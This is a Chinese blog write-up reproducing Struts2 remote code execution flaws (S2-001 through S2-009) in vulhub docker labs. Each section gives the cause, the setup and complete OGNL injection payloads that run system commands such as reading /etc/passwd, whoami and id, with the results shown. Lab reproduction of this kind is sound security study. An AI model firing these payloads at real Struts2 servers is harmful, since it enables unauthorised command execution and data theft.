(四)vulhub专栏:Struct2漏洞复现汇总(持续更新中...)

原创 已于 2022-08-05 14:45:13 修改
· 2.2k 阅读 · 7 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #struct2 #远程代码执行

于 2022-07-12 15:26:19 首次发布
本文详细介绍了Struts2框架中的多个远程代码执行漏洞,包括S2-001、S2-005、S2-007、S2-008和S2-009。每个漏洞的成因、利用环境和复现步骤均有详尽阐述,通过环境配置、POC构造和执行结果验证了漏洞的存在和利用可能性。这些漏洞主要涉及OGNL表达式解析机制的缺陷,允许攻击者通过特定输入执行任意系统命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Struct2漏洞复现汇总

S2-001远程代码执行漏洞

漏洞发现

通过网页后缀来发现是否为xxx.doxxx.action,有的需要抓包看提交的请求链接是否存在以上两种情况,有的是在返回的链接上。

漏洞成因

当用户提交表单数据且验证失败时,服务器使用OGNL表达式%{value}解析用户先前提交的参数值,并重新填充相应的表单数据。例如,在注册或登录页面中,如果提交失败,则服务器通常默认情况下将返回先前提交的数据。由于服务器用%{value}对提交的数据执行OGNL表达式解析,因此服务器可以直接发送有效载荷来执行命令。

漏洞利用

环境准备
名称IP
攻击机192.168.75.159
靶机192.168.75.146

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8080即可

cd vulhub-master/struts2/s2-001
docker-compose up -d

image-20220712150815568

看到如上界面便是启动成功了。

漏洞复现

用户名随意输入,密码输入以下内容

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

可以看到如下返回结果,证明该漏洞利用成功

image-20220712151901459

S2-005远程代码执行漏洞

漏洞发现

通过网页后缀来发现是否为xxx.doxxx.action,有的需要抓包看提交的请求链接是否存在以上两种情况,有的是在返回的链接上。

漏洞成因

服务器使用OGNL表达式%{value}解析每个请求参数名。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制。在S2-003中,Struts会将HTTP的每个参数名解析为OGNL语句执行(可以理解为Java代码),
例如:XWork会将GET参数的键和值利用OGNL表达式解析成Java语句,如:

user.address.city=Bishkek&user['favoriteDrink']=kumys 
//会被转化成
action.getUser().getAddress().setCity("Bishkek")  
action.getUser().setFavoriteDrink("kumys")

官方对003的修复方法是增加了安全模式(沙盒),S2-005在OGNL表达式中将安全模式关闭,又绕过了修复方法。整体过程如下:

  • S2-003 使用\u0023绕过s2对#的防御
  • S2-003 后官方增加了安全模式(沙盒)
  • S2-005 使用OGNL表达式将沙盒关闭,继续执行代码

漏洞利用

环境准备
名称IP
攻击机192.168.75.159
靶机192.168.75.146

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8080即可

cd vulhub-master/struts2/s2-005
docker-compose up -d

image-20220712164115895

看到如上界面便是启动成功了。

漏洞复现

在Get请求Url中拼凑下方的Poc,该Poc是在tmp目录下创建一个success文件。

?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1

然后去靶机查看是否成功创建success文件,操作如下:

docker ps

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f958634c2dbe s2-005_struts2 “catalina.sh run” 4 seconds ago Up 4 seconds 0.0.0.0:8080->8080/tcp, :::8080->8080/tcp s2-005_struts2_1

docker exec -it f958634c2dbe /bin/bash
ls /tmp

hsperfdata_root success

看到如上回显便是成功利用了该漏洞

S2-007远程代码执行漏洞

漏洞成因

age参数只能是整数,而非整数会导致错误,struct会将用户的输入当作ongl表达式执行,从而导致了该漏洞

漏洞利用

环境准备
名称IP
攻击机192.168.159.135
靶机192.168.159.129

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.159.129:8080即可

cd vulhub-master/struts2/s2-007
docker-compose up -d

image-20220803141735835

看到如上界面便是启动成功了。

漏洞复现

用户名和邮箱随意输入,age输入以下内容:

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())) + '

可以看到如下返回结果,证明该漏洞利用成功

image-20220803142224600

S2-008远程代码执行漏洞

漏洞成因

?debug=command&expression=处存在OGNL远程代码执行漏洞

漏洞利用

环境准备
名称IP
攻击机192.168.159.135
靶机192.168.159.129

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.159.129:8080即可

cd vulhub-master/struts2/s2-008
docker-compose up -d

image-20220804155614435

看到如上界面便是启动成功了。

漏洞复现

抓包devmode.action在域名后面拼接如下内容:

?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22whoami%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()

可以看到如下返回结果,证明该漏洞利用成功

image-20220804162133615

S2-009远程代码执行漏洞

漏洞成因

当前版本的action中接受了某个参数example,这个参数将进入OGNL的上下文。我们可以将OGNL表达式放在example参数中,然后使用/HelloWorld.acton?example=&(example)(‘xxx’)=1的方法来执行绕过。

漏洞利用

环境准备
名称IP
攻击机192.168.159.135
靶机192.168.159.129

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.159.129:8080即可

cd vulhub-master/struts2/s2-009
docker-compose up -d

image-20220805143117079

看到如上界面便是启动成功了。

漏洞复现

抓包在域名后面拼接如下内容:

/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

可以看到如下返回结果,证明该漏洞利用成功

image-20220805143955486

经测试,后缀为.action的拼接payload,好几处均可造成代码执行

Spring Boot2.x系列教程 | 文章汇总专栏汇总(持续更新.............)
Thinkingcao的专栏
12-30 2762
Spring Boot使用注解控制Api接口幂等性之前后端分离架构设计:https://blog.csdn.net/Thinkingcao/article/details/103578562
总目录- AutoSAR从入门到精通实战系列课程【持续更新...
10-14 4万+
欢迎大家订阅《AutoSAR入门和实战系列》,开始前博主先列出AutoSAR学习的大纲,同时这也可以作为大家学习AutoSAR的参考。想学习和及以及的同学们,可以订阅本博客,本博客一直持续更新中。如果想深入或从本质上学习和理解AutoSAR,打开此链接后,,点击左下方【立即订阅】订阅专栏!!!】......
vulhub漏洞复现
qq_30854761的博客
04-26 4291
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 优快云 这个平台认识更多的安全爱好者
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1734
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
Struct2命令执行漏洞
Jim的博客
08-22 1653
Struct2漏洞产生原因: 1.Apache Struts2的“Dynamic Method Invocation”机制是默认开启的,仅提醒用户如果可能的情况下关闭此机制,如果未关闭此机制将导致远程代码执行漏洞远程攻击者可利用此漏洞在受影响应用上下文中执行任意代码。 2.Apache Struts2在实现过程中使用了OGNL表达式,并将用户通过URL提交的内容拼接入OGNL表达式中,当de
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 1062
vulhub漏洞复现练习篇
《Autosar从入门到精通-实战篇》总目录_培训教程持续更新...
「汽车电子助手」的博客
01-10 11万+
欢迎大家订阅《Autosar从入门到精通-实战篇》,下方整理了相关博文的目录(单击蓝色字体即可跳转),方便大家获取。 本专栏旨在:扫除Autosar工具链配置过程中的障碍,加深对Autosar理论的理解。 温馨提醒: 如有疑问,可在博文的“评论区”给小编留言,进行技术交流(评论区开启了验证功能,审核通过后,会显示); 如有疑问,也可以通过博文中的第一个图片联系小编,获取专栏/博文的实时状态; 由于工作限制,仅做个人技术交流。添加好友时,请备注您的“姓名-公司-职务...
struts2-core 中的 I18nInterceptor 类在初始化报错..如何解决?
最新发布
**My Coding Family**
04-28 1295
🏆 本文收录于《全栈Bug调优(实战版)专栏,致力于分享我在项目实战过程中遇到的各类Bug及其原因,并提供切实有效的解决方案。无论你是初学者还是经验丰富的开发者,本文将为你指引出一条更高效的Bug修复之路,助你早日登顶,迈向财富自由的梦想🚀!同时,欢迎大家关注、收藏、订阅本专栏,更多精彩内容正在持续更新中。让我们一起进步,Up!Up!Up!    备注: 部分问题/难题源自互联网,但经过精心筛选和整理,保证每一条解决方案都经过实战验证,真实可靠。
《Python基础教程》内容总览篇(持续更新中)
热门推荐
weixin_43178406的博客
08-26 30万+
大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为优快云博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的知识进行总结与归纳,不仅形成深入且独到的理解,而且能够帮助新手快速入门。个人精心开设的《Python基础课程》专栏订阅量接近900,帮助不少同学解决了Bug。
vulhub漏洞复现1
xhscxj的博客
05-23 2091
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
vulhub-spring漏洞复现
qq_51922767的博客
09-14 3015
vulhub-spring漏洞复现
struct2漏洞及升级
HWL_SZ的专栏
12-03 381
一、Struct2漏洞原理[转] Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http 的参数。它将每个http参数声明为一个ONGL语句。当我们提交一个http参数: ?user.address.city=Bishkek&user['favoriteDrink']=kumys ONGL将它转换为: a...
Vulhub漏洞复现
weixin_45995579的博客
09-30 1881
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
vulhub漏洞复现66_Spring
weixin_44193247的博客
02-13 1273
vulhub漏洞复现练习篇
Struts2漏洞
2403_82795493的博客
02-20 4017
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
vulhub漏洞复现79_Jboss
weixin_44193247的博客
02-16 1716
vulhub漏洞复现练习篇
Vulhub 漏洞环境复现环境
ST0new的博客
05-20 1095
Vulhub 简介 漏洞复现不用愁 展示 Vulhub 是预先构建的易受攻击的 docker 环境的开源集合。不需要已有的 docker 知识,只需执行两个简单的命令,您就有了一个易受攻击的环境。 安装 在 Ubuntu 20.04 上安装 docker/docker-compose: # 安装pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 # 安装最新版docker curl -s https://get.docker.com/ |
vulhub漏洞复现73_Webmin
weixin_44193247的博客
02-13 427
vulhub漏洞复现练习篇
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值